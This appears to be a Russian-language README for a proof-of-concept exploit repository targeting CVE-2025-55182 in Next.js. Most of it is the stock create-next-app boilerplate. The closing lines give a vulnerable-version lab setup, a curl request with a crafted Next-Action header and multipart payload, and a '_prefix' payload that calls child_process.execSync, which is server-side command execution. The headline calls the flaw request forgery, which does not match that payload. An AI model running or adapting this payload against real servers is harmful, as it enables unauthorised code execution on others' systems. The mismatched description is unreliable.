
Эксплойт, подтверждающий концепцию для CVE-2025-55182, нацеленный на подделку запросов на стороне сервера Next.js через специально созданные multipart-запросы с манипуляцией заголовком Next-Action.
Это проект Next.js, созданный с помощью create-next-app.
Сначала запустите сервер разработки:
npm run dev
# or
yarn dev
# or
pnpm dev
# or
bun dev
Откройте http://localhost:3000 в браузере, чтобы увидеть результат.
Вы можете начать редактировать страницу, изменив app/page.tsx. Страница автоматически обновляется при изменении файла.
Этот проект использует next/font для автоматической оптимизации и загрузки Geist, нового семейства шрифтов от Vercel.
Чтобы узнать больше о Next.js, ознакомьтесь с этими ресурсами:
Вы можете посмотреть репозиторий Next.js на GitHub — ваши отзывы и вклад приветствуются!
Самый простой способ развернуть ваше приложение Next.js — использовать платформу Vercel от создателей Next.js.
Ознакомьтесь с нашей документацией по развертыванию Next.js для получения дополнительных сведений.
npx create-next-app@latest react-vuln-lab
npm install [email protected] [email protected] [email protected] --legacy-peer-deps
curl -v http://localhost:3000/ \
-H "Content-Type: multipart/form-data; boundary=boundary" \
-H "Next-Action: <YOUR_ACTION_ID_HERE>" \
--data-binary @payload.txt
- "_prefix": "require('child_process').execSync('whoami').toString()"